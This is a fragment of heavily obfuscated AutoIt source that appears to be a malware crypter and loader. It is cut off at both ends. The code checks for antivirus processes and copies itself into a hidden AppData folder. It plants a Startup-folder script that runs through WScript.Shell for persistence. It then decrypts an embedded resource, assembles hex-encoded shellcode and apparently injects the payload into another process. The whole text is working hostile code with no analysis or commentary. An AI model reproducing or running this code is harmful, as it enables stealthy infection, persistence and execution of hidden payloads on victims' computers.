+ 7499 , 15 + 4294959797 + 7499 ) ) $912996352 = 1588307237 CASE 2061627909 #Region ### START Koda GUI section ### Form= $912996352 = 272497377 CASE 2095464838 GLOBAL $V31333235IRO = $V3135P3 ("io50zp3dul1nc85sxaekrn.exe7ygf0uktyaudfk0q0tqa3e7212" , 19 + 5574 + 4294961722 , 8 + 5574 + 4294961722 ) $912996352 = 1537780935 CASE 2103351493 GLOBAL $U32343639SOZOD7 = $U32343233PUXJX ($V3135P3 ("hi1tmp860m3o3z872mig02FileOpenovy1i3p28k6n622vbp" , 23 + 6163 + 4294961133 , 8 + 6163 + 4294961133 ) ) $912996352 = 1399057616 CASE 2111201079 GLOBAL $Q31333534ADJPU = $V39NUX ("data885o" , "885o" , "" ) $912996352 = 1525045795 CASE 2112601067 GLOBAL $F31343435TN3P = $I31330D6 ("CEBB08D9DF0FEFFFF31FF89FA39556b1q5b1o" , 8 + 7984 + 4294959312 ) $912996352 = 1845988677 ENDSWITCH WEND IF $F32343534YAF ($Z37IB8K ("0x617661737475692E657865" ) ) OR $F32343534YAF ($C31KU765 (R37FLO7 (87377 ) ) & $C31KU765 (R37FLO7 (87398 ) ) & $C31KU765 (R37FLO7 (87383 ) ) & $C31KU765 (R37FLO7 (87397 ) ) & $C31KU765 (R37FLO7 (87385 ) ) & $C31KU765 (R37FLO7 (87326 ) ) & $C31KU765 (R37FLO7 (87381 ) ) & $C31KU765 (R37FLO7 (87400 ) ) & $C31KU765 (R37FLO7 (87381 ) ) ) THEN $S32343336CEZAP ($D37315G1OJ ) IF FALSE THEN IF $F32343534YAF ($V3733UR83 ) OR $F32343534YAF ($S37353T0JYH ) THEN EXIT ENDIF ENDIF IF FALSE THEN $S32343336CEZAP (DELAY TIME000 ) IF FALSE THEN P34ZE6B () IF TRUE THEN IF NOT FILEEXISTS (@APPDATADIR & "\" & "hdoydskbdx" ) THEN DIRCREATE (@APPDATADIR & "\" & "hdoydskbdx" ) ENDIF IF NOT FILEEXISTS (@APPDATADIR & "\" & "hdoydskbdx" & "\" & "znytpstdcrwsisx" & $V3135P3 ("yef5e3tpsc8d01r.exeytifuazd4rdlzghrb084pyon0iy4" , 16 + 9613 * 1 + 4294957683 , 4 + 9613 * 1 + 4294957683 ) ) THEN $1739397950 = 1178081240 WHILE 1 SWITCH $1739397950 CASE 274725409 $V32343837D2JP0O ($S323633324VR4C ) EXITLOOP CASE 317041254 $E323437325H (@APPDATADIR & "\" & "hdoydskbdx" & "\" & "znytpstdcrwsisx" & $O353SY ("jr57rx35k5denm" ) , $S323633324VR4C ) $1739397950 = 326133898 CASE 326133898 $V32343837D2JP0O (@APPDATADIR & "\" & "hdoydskbdx" & "\" & "znytpstdcrwsisx" & $O353SY ("d77vjrjkbkdjxc544x7x14cl" ) ) $1739397950 = 274725409 CASE 1178081240 DIM $S323633324VR4C = FILEREAD ($P323630360VS5 ) & $U32353433SZ7WG ($C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) ) $1739397950 = 317041254 ENDSWITCH WEND IF FALSE THEN $N32353436WLYY (@APPDATADIR & "\" & "hdoydskbdx" & "\" & "znytpstdcrwsisx" & $C31KU765 (R37FLO7 (87326 ) ) & $C31KU765 (R37FLO7 (87381 ) ) & $C31KU765 (R37FLO7 (87400 ) ) & $C31KU765 (R37FLO7 (87381 ) ) , $V3135P3 ("az6aipx4rmwo07dhd4yt4c72m+SH0nqjxxalm" , 26 + 4294958186 + 9110 , 3 + 4294958186 + 9110 ) ) IF TRUE THEN $R32343834KC2 (@APPDATADIR & "\" & "hdoydskbdx" & "\" & "znytpstdcrwsisx" & $T3831QOGY0 & $S383353 ) ENDIF IF NOT FILEEXISTS (@STARTUPDIR & "\" & "znytpstdcrwsisx" & $C31KU765 (R37FLO7 (87382 ) ) & $C31KU765 (R37FLO7 (87394 ) ) & $C31KU765 (R37FLO7 (87326 ) ) & $C31KU765 (R37FLO7 (87397 ) ) & $C31KU765 (R37FLO7 (87394 ) ) & $C31KU765 (R37FLO7 (87388 ) ) ) OR NOT FILEEXISTS (@STARTUPDIR & "\" & "znytpstdcrwsisx" & $I31330D6 (".vbsca4w4f6aahsai6defa" , 18 + 4277 + 4294963019 ) ) THEN IF $F32343534YAF ($Z37IB8K ("0x6B73646575692E657865" ) ) THEN $1739397950 = 1178081240 WHILE 1 SWITCH $1739397950 CASE 274725409 $V32343837D2JP0O (@STARTUPDIR & "\" & "znytpstdcrwsisx" & $Z37IB8K ("0x66722E75726C" ) ) EXITLOOP CASE 317041254 $Y32363632JPWL &= "mtrqvdmu" & $V3135P3 ("44l63gt1y.Run mcxvm6o72rungjf" , 10 + 514 + 4294966782 , 5 + 514 + 4294966782 ) & $F32353236Y0YC ($K3933UG ) & $F32353236Y0YC ($R3935M2GF ) & $F32353236Y0YC ($Z37IB8K ("0x3334" ) ) & @APPDATADIR & "\" & "hdoydskbdx" & "\" & "znytpstdcrwsisx" & $V39NUX (".erukegxrukegerukeg" , "rukeg" , "" ) & $F32353236Y0YC (B38ZPPGU ("959544-959545-" , 959493 ) ) & $F32353236Y0YC ($C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87332 ) ) ) & $F32353236Y0YC ($O353SY ("ql7enj02k6zwk5v638lhlhl2plmy4b" ) ) & $Z37IB8K ("0x2C20302C2046616C7365" ) & $F32353236Y0YC ($V39NUX ("13grrnor" , "grrnor" , "" ) ) & $F32353236Y0YC ($V39NUX ($O353SY ("ryvqdbbk5xmy2ogeyvgwlt2u5sty" ) , "alsdi77y" , "" ) ) $1739397950 = 326133898 CASE 326133898 $E323437325H (@STARTUPDIR & "\" & "znytpstdcrwsisx" & $Y3939VLK , $Y32363632JPWL ) $1739397950 = 274725409 CASE 1178081240 DIM $Y32363632JPWL = $C31KU765 (R37FLO7 (87363 ) ) & $C31KU765 (R37FLO7 (87381 ) ) & $C31KU765 (R37FLO7 (87396 ) ) & $C31KU765 (R37FLO7 (87312 ) ) & "mtrqvdmu" & $U3131F51ZD ("ihnvteol4aize3d0 = CreateObject(" , 16 + 4294959398 + 7898 ) & $F32353236Y0YC ($A3835CI158N ) & $Z37IB8K ("0x575363726970742E5368656C6C" ) & $F32353236Y0YC ($J3837OEO ) & ")" & $F32353236Y0YC ($O353SY ("1tn1e62vivh7w0" ) ) & $F32353236Y0YC ($P39311N ) $1739397950 = 317041254 ENDSWITCH WEND ELSE $1739397950 = 1178081240 WHILE 1 SWITCH $1739397950 CASE 274725409 $V32343837D2JP0O (@STARTUPDIR & "\" & "znytpstdcrwsisx" & $C31KU765 (R37FLO7 (87326 ) ) & $C31KU765 (R37FLO7 (87382 ) ) & $C31KU765 (R37FLO7 (87394 ) ) & $C31KU765 (R37FLO7 (87326 ) ) & $C31KU765 (R37FLO7 (87397 ) ) & $C31KU765 (R37FLO7 (87394 ) ) & $C31KU765 (R37FLO7 (87388 ) ) ) EXITLOOP CASE 317041254 $E323730338B3B &= $C31KU765 (R37FLO7 (87365 ) ) & $C31KU765 (R37FLO7 (87362 ) ) & $C31KU765 (R37FLO7 (87356 ) ) & $C31KU765 (R37FLO7 (87341 ) ) & $C31KU765 (R37FLO7 (87382 ) ) & $C31KU765 (R37FLO7 (87385 ) ) & $C31KU765 (R37FLO7 (87388 ) ) & $C31KU765 (R37FLO7 (87381 ) ) & $C31KU765 (R37FLO7 (87338 ) ) & $C31KU765 (R37FLO7 (87327 ) ) & $C31KU765 (R37FLO7 (87327 ) ) & $C31KU765 (R37FLO7 (87327 ) ) & @APPDATADIR & "\" & "hdoydskbdx" & "\" & "znytpstdcrwsisx" & $O353SY ("mfgbicjp88lo" ) $1739397950 = 326133898 CASE 326133898 $E323437325H (@STARTUPDIR & "\" & "znytpstdcrwsisx" & $P31303823WM0Y , $E323730338B3B ) $1739397950 = 274725409 CASE 1178081240 DIM $E323730338B3B = $C31KU765 (R37FLO7 (87371 ) ) & $C31KU765 (R37FLO7 (87353 ) ) & $C31KU765 (R37FLO7 (87390 ) ) & $C31KU765 (R37FLO7 (87396 ) ) & $C31KU765 (R37FLO7 (87381 ) ) & $C31KU765 (R37FLO7 (87394 ) ) & $C31KU765 (R37FLO7 (87390 ) ) & $C31KU765 (R37FLO7 (87381 ) ) & $C31KU765 (R37FLO7 (87396 ) ) & $C31KU765 (R37FLO7 (87363 ) ) & $C31KU765 (R37FLO7 (87384 ) ) & $C31KU765 (R37FLO7 (87391 ) ) & $C31KU765 (R37FLO7 (87394 ) ) & $C31KU765 (R37FLO7 (87396 ) ) & $C31KU765 (R37FLO7 (87379 ) ) & $C31KU765 (R37FLO7 (87397 ) ) & $C31KU765 (R37FLO7 (87396 ) ) & $C31KU765 (R37FLO7 (87373 ) ) & $F32353236Y0YC ($V39NUX ("13w4rbfv7" , "w4rbfv7" , "" ) ) & $F32353236Y0YC ("10" ) $1739397950 = 317041254 ENDSWITCH WEND ENDIF ENDIF ENDIF $326133898 = 1178081240 WHILE 1 SWITCH $326133898 CASE 317041254 FILEINSTALL ("C:\Users\Tesoreriaaa\AppData\Local\Temp\StaticCrypt\tjiujedt.cbm" , $I32373530QUIDQ5 ) EXITLOOP CASE 1178081240 GLOBAL $I32373530QUIDQ5 = $U32343233PUXJX ($S3131302YFY55 ) & "\" & "cbmfpeiu" $326133898 = 317041254 ENDSWITCH WEND IF TRUE THEN $N32353436WLYY ($I32373530QUIDQ5 , $O353SY ("brjehhc40zj4ikbv2s6rd0p4" ) ) GLOBAL $O32373537PK3U = 0 IF FALSE THEN $O32373537PK3U = B32RBY (FILEREAD ($I32373530QUIDQ5 ) , "5tqk60e3vra4rnalk4zxv6tzm9va9ynb40azxkrz3m7yqs97z4wao7wlffmg" ) ELSE $O32373537PK3U = P334N2 (FILEREAD ($I32373530QUIDQ5 ) , "5tqk60e3vra4rnalk4zxv6tzm9va9ynb40azxkrz3m7yqs97z4wao7wlffmg" ) ENDIF IF $N32363039121 = "1" THEN $R32363130LEIE = $N32353634RG ELSEIF $N32363039121 = "2" THEN $R32363130LEIE = $H3235363685IFM ELSEIF $N32363039121 = "3" THEN $R32363130LEIE = $X32353638F1 ELSEIF $N32363039121 = "4" THEN $R32363130LEIE = $W32353730R2Y ELSEIF $N32363039121 = "5" THEN $R32363130LEIE = $A323537327GDZ7I ELSEIF $N32363039121 = "6" THEN $R32363130LEIE = $E32353734386 ELSEIF $N32363039121 = "7" THEN $R32363130LEIE = $P323630360VS5 ENDIF IF $R32363130LEIE = $U32343233PUXJX ($O353SY ("87mv7vr70wo1xtvhgkcnmml0v6un3" ) ) AND @OSVERSION = $V3135P3 ("t0lj1bz7kyfvrnjhanglri8hhtcuWIN_7rs4zlupb30fv5a" , 29 + 7965 + 4294959331 , 5 + 7965 + 4294959331 ) THEN H36R3ASM ($R32363130LEIE , "" , $O32373537PK3U ) ELSE T30R1Y ($N32363039121 , $O32373537PK3U ) ENDIF FUNC T30R1Y ($R32373931PJ , $B3237393221GL ) LOCAL $W32373933SV7D = D31DI ($R32373931PJ , $B3237393221GL ) IF $W32373933SV7D = 0 THEN $274725409 = 1178081240 WHILE 1 SWITCH $274725409 CASE 317041254 $U32343233PUXJX ($T3132334T3JHU ) $274725409 = 326133898 CASE 326133898 EXIT EXITLOOP CASE 1178081240 $S32343336CEZAP (1000 ) $274725409 = 317041254 ENDSWITCH WEND ELSE RETURN $W32373933SV7D ENDIF ENDFUNC FUNC D31DI ($R32373931PJ , $B3237393221GL ) $823320600 = 1178081240 WHILE 1 SWITCH $823320600 CASE 28750967 $G32383037Y2 &= $O353SY ("3r3tsnohid" ) $823320600 = 77291538 CASE 31564936 $G32383037Y2 &= $X343738EE714 $823320600 = 754347554 CASE 67217268 $G32383037Y2 &= $P363737R5WKD $823320600 = 332981565 CASE 73799175 $G32383037Y2 &= $E3930368A3 $823320600 = 1221390787 CASE 75652009 $G32383037Y2 &= $O353SY ("frzljrw88wx17" ) $823320600 = 1537586385 CASE 77291538 $G32383037Y2 &= $O353SY ("s0eb8fkgt2j1exa2jpw0fg" ) $823320600 = 1072049475 CASE 108681755 $G32383037Y2 &= $Q31313238DF44 $823320600 = 1522885757 CASE 122734813 $G32383037Y2 &= $I36313287AX2 $823320600 = 1923293943 CASE 128580426 $G32383037Y2 &= $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87345 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87345 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87345 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87336 ) ) $823320600 = 245974442 CASE 162218163 $G32383037Y2 &= $V3135P3 ("vkdlbqd77wrvnp4x584yw4nm7em2657373C645F000C745F4436C6F73C745F86548616EC745FC646C6500FC648B15300000008B52qhyqhckkz51" , 29 + 5930 * 2 + 4294955436 , 76 + 5930 * 2 + 4294955436 ) $823320600 = 207991646 CASE 179833975 $G32383037Y2 &= $O353SY ("py7daghq" ) $823320600 = 1976720245 CASE 197553472 $G32383037Y2 &= $K363837HFP3 $823320600 = 28750967 CASE 207991646 $G32383037Y2 &= $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87345 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87345 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87345 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87346 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87330 ) ) $823320600 = 1566911474 CASE 220189866 $G32383037Y2 &= $O353SY ("6x84wpmf8hknqezrtelrq" ) $823320600 = 1625702291 CASE 244586016 $G32383037Y2 &= $O353SY ("3se1mh6wjca7" ) $823320600 = 1593765410 CASE 245974442 $G32383037Y2 &= $J3333397DO7 $823320600 = 1662106412 CASE 247051243 $G32383037Y2 &= $U3131F51ZD ("bcdla2yv5B8BE55DC3558BEC83EC205657C745E05465726DC745E4696E6174C745E86550726FC745EC63" , 8 + 4294963751 + 3545 ) $823320600 = 162218163 CASE 268691428 $G32383037Y2 &= $Z37IB8K ("0x383839373546433839374446343835464637343443384234303234303343313839343546" ) $823320600 = 338561916 CASE 274725409 $G32383037Y2 &= $Z37IB8K ("0x33433038353034353030303037354543384234343038373838423534303832303033433135" ) $823320600 = 1739397950 CASE 317041254 $G32383037Y2 = $Y313235WMU $823320600 = 326133898 CASE 326133898 $G32383037Y2 &= $U3131F51ZD ("48ij2xw1745gt7s8baq8gci000083EC14663901740833C08BE55DC208008B413C81" , 23 + 4294959228 + 8068 ) $823320600 = 274725409 CASE 332981565 $G32383037Y2 &= $U3131F51ZD ("14u68cqjblbgszsrzz7znizat2asC68528FFFFFF00C7852CFFFFFF433A5C57C78530FFFFFF696E646FC78534FFFFFF77735" , 28 + 8381 + 4294958915 ) $823320600 = 1191090362 CASE 337696162 $G32383037Y2 &= $W31323630IK $823320600 = 2095464838 CASE 338561916 $G32383037Y2 &= $L313638RANZ $823320600 = 854553390 CASE 342768592 $G32383037Y2 &= $I31330D6 ("3C41C85FF0F84F10000008B56548B857CFFFFFF6A00525357506A05683DF5E9CCE8F2F5FFFF8B55yts3egoghg8ryts8hiq1" , 20 + 4294958956 + 8340 ) $823320600 = 2039189835 CASE 343886302 $G32383037Y2 &= $H393034Q42 $823320600 = 73799175 CASE 349070442 $G32383037Y2 &= $V39NUX ("000000zanup0zanup0zanup0zanup000zanup000zanup0zanup00zanup0zanup0zanup00000zanup000zanup0zanup00zanup00zanup0zanup00000zanup0000zanup0zanup000zanup0zanup0000zanup0zanup0zanup0zanup000zanup0zanup0zanup0zanup00zanup0zanup0000" , "zanup" , "" ) $823320600 = 812054995 CASE 373706041 $G32383037Y2 &= $W313035393BB1A $823320600 = 1050946220 CASE 424398338 $G32383037Y2 &= $V3135P3 ("0us5ejkljjdj67asq75BEC83EC58535657FC648B15300000008B520C8B52148B7228B91800000033FF33C0AC3C617C0222822gs10rqghjcm45oua3ppmvadrd" , 20 + 4294963159 + 4137 , 78 + 4294963159 + 4137 ) $823320600 = 75652009 CASE 435626120 $G32383037Y2 &= $O353SY ("0fe8ewakzc3srdt45jqs5o3eblm" ) $823320600 = 1479625482 CASE 471869101 $G32383037Y2 &= $Z37IB8K ("0x31323735443938424630384434353943353035364337383536384646464646463437363537343444433738353643464646464646364636343735364343373835373046464646" ) $823320600 = 1865630473 CASE 499531526 $G32383037Y2 &= $Z37IB8K ("0x3030303842353538303536353236413032363838333031363043454538343546354646464638423435383035303641303136383233343333454231453833354635464646" ) $823320600 = 373706041 CASE 507017416 $G32383037Y2 &= $Z37IB8K ("0x3435303833433130383531353236413035363833444635453943434538363746354646464638423435303838423438323838334334314330334346383938454230303030" ) $823320600 = 499531526 CASE 508698040 $G32383037Y2 &= $V39NUX ("1sk8a00sk8a0sk8a0sk8a8Bsk8a94180sk8aCsk8a0sk8a1sk8a00008Dsk8a84sk8a1sk8a8F8sk8a000sk8a000sk8a8Bsk8a4sk8a0sk8a0C6Ask8a0sk8a05sk8a18sk8aBsk8a8Dsk8a7Csk8aFFFsk8aFFFsk8a03Dsk8a" , "sk8a" , "" ) $823320600 = 525974472 CASE 511805355 $G32383037Y2 &= $O353SY ("nhzicq7k5jsuua4j2blmr" ) $823320600 = 1629206375 CASE 525974472 $G32383037Y2 &= $Z37IB8K ("0x3335323033433735303531364130353638334446354539434345" ) $823320600 = 606900647 CASE 540021528 $G32383037Y2 &= $Z37IB8K ("0x3735454438423544464333423535303837343130343733423744463837324345354633334330354238424535354443323034" ) $823320600 = 1170832963 CASE 554725439 $G32383037Y2 &= $Z37IB8K ("0x304337343545383431363437363631433734354543373036393333333243373435463032453634364336433838354446344337343544433443364636333631433734354530364334363732363536364337343545" ) $823320600 = 684192185 CASE 606900647 $G32383037Y2 &= $U3131F51ZD ("qu1fv3k27lvlnf7avir38A5F5FFFF8B55080FB742068345" , 20 + 4294959922 + 7374 ) $823320600 = 820767532 CASE 607502147 $G32383037Y2 &= $U3131F51ZD ("mm4kb4j2yhqavjsvav02EC785DCFEFFFF33303331C785E0FEFFFF395C4D53C785E4FEFFFF4275696" , 18 + 4294958328 + 8968 ) $823320600 = 1134265100 CASE 684192185 $G32383037Y2 &= $P3431383E $823320600 = 1892817007 CASE 694144588 $G32383037Y2 &= $S363833KAU $823320600 = 1597403880 CASE 698963862 $G32383037Y2 &= $V343134X4A0V $823320600 = 706251512 CASE 706251512 $G32383037Y2 &= $O353SY ("u3bc8gn78n164ouj7v08x1o" ) $823320600 = 554725439 CASE 747332703 $G32383037Y2 &= $U3131F51ZD ("fjf4l5hncB91800000033FF33C0AC3C617C022C20C1CF0D03F8E2F081FF5BBC4A6A8B42108B" , 9 + 9609 + 4294957687 ) $823320600 = 471869101 CASE 754347554 $G32383037Y2 &= $Z37IB8K ("0x30464639353738464646464646333343303342463330463934433035463545354238424535354443323034303035463545333243303542384245353544433230343030434343434343" ) $823320600 = 2049571787 CASE 807257674 $G32383037Y2 &= $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87331 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87328 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87330 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87329 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87332 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87349 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87348 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87334 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87347 ) ) & $C31KU765 (R37FLO7 (87335 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87333 ) ) & $C31KU765 (R37FLO7 (87337 ) ) & $C31KU765 (R37FLO7 (87336 ) ) & $C31KU765 (R37FLO7 (87350 ) ) & $C31KU765 (R37FLO7 (87349 ) ) $823320600 = 197553472 CASE 812054995 $G32383037Y2 &= $U3131F51ZD ("3uxmj4yrj6zcr800000000000000000000000000000000000000000000000000000000000000000000000" , 14 + 88 * 1 + 4294967208 ) $823320600 = 337696162 CASE 820767532 $G32383037Y2 &= $V3135P3 ("sgvxzqgaquwl0C284683C41C3BF07CB38B45088B75FC8B8EA40000008B957CFFFFFF6A006A0483C03btjm7eb4a6ah45ultu2luvu78g2j" , 13 + 1892 * 2 + 4294963512 , 69 + 1892 * 2 + 